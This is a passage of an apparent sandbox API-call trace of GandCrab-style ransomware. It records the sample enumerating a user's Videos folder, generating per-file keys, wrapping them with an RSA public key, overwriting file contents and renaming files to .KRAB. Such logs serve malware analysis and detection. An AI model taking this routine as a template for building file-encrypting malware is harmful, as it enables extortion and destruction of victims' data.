flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.329] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0098.329] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0098.330] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\d2ca4a08d2ca4dee3d.lock") returned 52 [0098.330] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0098.330] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.331] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.331] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\") returned 29 [0098.331] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\*" [0098.331] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbd5a0 [0098.331] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0098.331] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.331] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0098.331] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0098.331] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.331] lstrcmpW (lpString1="1076.avi", lpString2=".") returned 1 [0098.331] lstrcmpW (lpString1="1076.avi", lpString2="..") returned 1 [0098.331] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="1076.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1076.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1076.avi" [0098.331] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.332] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1076.avi.KRAB") returned 42 [0098.332] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1076.avi") returned 37 [0098.332] lstrlenW (lpString=".avi") returned 4 [0098.332] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.332] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".avi ") returned 5 [0098.332] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.332] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1076.avi") returned 37 [0098.332] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1076.avi") returned 37 [0098.332] lstrcmpiW (lpString1="1076.avi", lpString2="desktop.ini") returned -1 [0098.332] lstrcmpiW (lpString1="1076.avi", lpString2="autorun.inf") returned -1 [0098.332] lstrcmpiW (lpString1="1076.avi", lpString2="ntuser.dat") returned -1 [0098.332] lstrcmpiW (lpString1="1076.avi", lpString2="iconcache.db") returned -1 [0098.332] lstrcmpiW (lpString1="1076.avi", lpString2="bootsect.bak") returned -1 [0098.332] lstrcmpiW (lpString1="1076.avi", lpString2="boot.ini") returned -1 [0098.332] lstrcmpiW (lpString1="1076.avi", lpString2="ntuser.dat.log") returned -1 [0098.332] lstrcmpiW (lpString1="1076.avi", lpString2="thumbs.db") returned -1 [0098.332] lstrcmpiW (lpString1="1076.avi", lpString2="KRAB-DECRYPT.html") returned -1 [0098.333] lstrcmpiW (lpString1="1076.avi", lpString2="KRAB-DECRYPT.txt") returned -1 [0098.333] lstrcmpiW (lpString1="1076.avi", lpString2="CRAB-DECRYPT.txt") returned -1 [0098.333] lstrcmpiW (lpString1="1076.avi", lpString2="ntldr") returned -1 [0098.333] lstrcmpiW (lpString1="1076.avi", lpString2="NTDETECT.COM") returned -1 [0098.333] lstrcmpiW (lpString1="1076.avi", lpString2="Bootfont.bin") returned -1 [0098.333] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.333] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011678) returned 1 [0098.333] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.334] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.334] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.334] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0098.334] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0098.334] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.334] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010f08) returned 1 [0098.335] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.335] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.335] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.335] CryptGenRandom (in: hProv=0x1010f08, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0098.335] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0098.335] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.336] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0098.336] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd920) returned 1 [0098.336] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.336] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.336] GetLastError () returned 0x0 [0098.336] CryptDestroyKey (hKey=0xfbd920) returned 1 [0098.336] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.337] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0098.337] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0098.337] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.337] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.337] GetLastError () returned 0x0 [0098.337] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0098.337] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.337] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1076.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\1076.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0098.338] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0098.338] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0098.338] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x4d84, lpOverlapped=0x0) returned 1 [0098.350] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffb27c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.350] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x4d84, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x4d84, lpOverlapped=0x0) returned 1 [0098.351] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0098.351] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.354] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.354] CloseHandle (hObject=0x434) returned 1 [0098.354] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.355] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1076.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\1076.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1076.avi.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\1076.avi.krab")) returned 1 [0098.355] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.355] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.355] lstrcmpW (lpString1="1EUx04bviY.swf", lpString2=".") returned 1 [0098.355] lstrcmpW (lpString1="1EUx04bviY.swf", lpString2="..") returned 1 [0098.355] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="1EUx04bviY.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1EUx04bviY.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1EUx04bviY.swf" [0098.356] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.356] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1EUx04bviY.swf.KRAB") returned 48 [0098.356] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1EUx04bviY.swf") returned 43 [0098.356] lstrlenW (lpString=".swf") returned 4 [0098.356] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.356] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".swf ") returned 5 [0098.356] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.356] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1EUx04bviY.swf") returned 43 [0098.356] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1EUx04bviY.swf") returned 43 [0098.356] lstrcmpiW (lpString1="1EUx04bviY.swf", lpString2="desktop.ini") returned -1 [0098.356] lstrcmpiW (lpString1="1EUx04bviY.swf", lpString2="autorun.inf") returned -1 [0098.356] lstrcmpiW (lpString1="1EUx04bviY.swf", lpString2="ntuser.dat") returned -1 [0098.356] lstrcmpiW (lpString1="1EUx04bviY.swf", lpString2="iconcache.db") returned -1 [0098.356] lstrcmpiW (lpString1="1EUx04bviY.swf", lpString2="bootsect.bak") returned -1 [0098.356] lstrcmpiW (lpString1="1EUx04bviY.swf", lpString2="boot.ini") returned -1 [0098.356] lstrcmpiW (lpString1="1EUx04bviY.swf", lpString2="ntuser.dat.log") returned -1 [0098.356] lstrcmpiW (lpString1="1EUx04bviY.swf", lpString2="thumbs.db") returned -1 [0098.356] lstrcmpiW (lpString1="1EUx04bviY.swf", lpString2="KRAB-DECRYPT.html") returned -1 [0098.356] lstrcmpiW (lpString1="1EUx04bviY.swf", lpString2="KRAB-DECRYPT.txt") returned -1 [0098.356] lstrcmpiW (lpString1="1EUx04bviY.swf", lpString2="CRAB-DECRYPT.txt") returned -1 [0098.357] lstrcmpiW (lpString1="1EUx04bviY.swf", lpString2="ntldr") returned -1 [0098.357] lstrcmpiW (lpString1="1EUx04bviY.swf", lpString2="NTDETECT.COM") returned -1 [0098.357] lstrcmpiW (lpString1="1EUx04bviY.swf", lpString2="Bootfont.bin") returned -1 [0098.357] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.357] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10113d0) returned 1 [0098.357] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.357] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.358] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.358] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0098.358] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0098.358] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.358] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011458) returned 1 [0098.358] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.358] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.359] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.359] CryptGenRandom (in: hProv=0x1011458, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0098.359] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0098.359] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.359] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011678) returned 1 [0098.359] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0098.359] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.359] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.359] GetLastError () returned 0x0 [0098.359] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0098.360] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0098.360] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0098.360] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0098.360] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.360] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.360] GetLastError () returned 0x0 [0098.360] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0098.360] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0098.360] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1EUx04bviY.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\1eux04bviy.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0098.361] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0098.361] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0098.361] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x5fcf, lpOverlapped=0x0) returned 1 [0098.371] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffa031, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.371] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x5fcf, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x5fcf, lpOverlapped=0x0) returned 1 [0098.371] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0098.372] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.375] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.375] CloseHandle (hObject=0x434) returned 1 [0098.375] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.375] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1EUx04bviY.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\1eux04bviy.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\1EUx04bviY.swf.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\1eux04bviy.swf.krab")) returned 1 [0098.377] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.377] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.377] lstrcmpW (lpString1="421-3GjN8PT.swf", lpString2=".") returned 1 [0098.377] lstrcmpW (lpString1="421-3GjN8PT.swf", lpString2="..") returned 1 [0098.377] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="421-3GjN8PT.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\421-3GjN8PT.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\421-3GjN8PT.swf" [0098.377] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.377] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\421-3GjN8PT.swf.KRAB") returned 49 [0098.378] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\421-3GjN8PT.swf") returned 44 [0098.378] lstrlenW (lpString=".swf") returned 4 [0098.378] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.378] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".swf ") returned 5 [0098.378] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.378] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\421-3GjN8PT.swf") returned 44 [0098.378] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\421-3GjN8PT.swf") returned 44 [0098.378] lstrcmpiW (lpString1="421-3GjN8PT.swf", lpString2="desktop.ini") returned -1 [0098.378] lstrcmpiW (lpString1="421-3GjN8PT.swf", lpString2="autorun.inf") returned -1 [0098.378] lstrcmpiW (lpString1="421-3GjN8PT.swf", lpString2="ntuser.dat") returned -1 [0098.378] lstrcmpiW (lpString1="421-3GjN8PT.swf", lpString2="iconcache.db") returned -1 [0098.378] lstrcmpiW (lpString1="421-3GjN8PT.swf", lpString2="bootsect.bak") returned -1 [0098.378] lstrcmpiW (lpString1="421-3GjN8PT.swf", lpString2="boot.ini") returned -1 [0098.378] lstrcmpiW (lpString1="421-3GjN8PT.swf", lpString2="ntuser.dat.log") returned -1 [0098.378] lstrcmpiW (lpString1="421-3GjN8PT.swf", lpString2="thumbs.db") returned -1 [0098.378] lstrcmpiW (lpString1="421-3GjN8PT.swf", lpString2="KRAB-DECRYPT.html") returned -1 [0098.378] lstrcmpiW (lpString1="421-3GjN8PT.swf", lpString2="KRAB-DECRYPT.txt") returned -1 [0098.378] lstrcmpiW (lpString1="421-3GjN8PT.swf", lpString2="CRAB-DECRYPT.txt") returned -1 [0098.378] lstrcmpiW (lpString1="421-3GjN8PT.swf", lpString2="ntldr") returned -1 [0098.378] lstrcmpiW (lpString1="421-3GjN8PT.swf", lpString2="NTDETECT.COM") returned -1 [0098.378] lstrcmpiW (lpString1="421-3GjN8PT.swf", lpString2="Bootfont.bin") returned -1 [0098.378] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.379] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0098.379] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.379] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.379] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.379] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0098.379] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0098.379] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.380] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0098.380] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.380] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.380] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.380] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0098.380] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0098.380] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.381] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10110a0) returned 1 [0098.381] CryptImportKey (in: hProv=0x10110a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd920) returned 1 [0098.381] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.381] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.381] GetLastError () returned 0x0 [0098.381] CryptDestroyKey (hKey=0xfbd920) returned 1 [0098.381] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0098.381] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011018) returned 1 [0098.382] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd920) returned 1 [0098.382] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.382] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.382] GetLastError () returned 0x0 [0098.382] CryptDestroyKey (hKey=0xfbd920) returned 1 [0098.382] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0098.382] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\421-3GjN8PT.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\421-3gjn8pt.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0098.382] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0098.382] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0098.383] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x16c31, 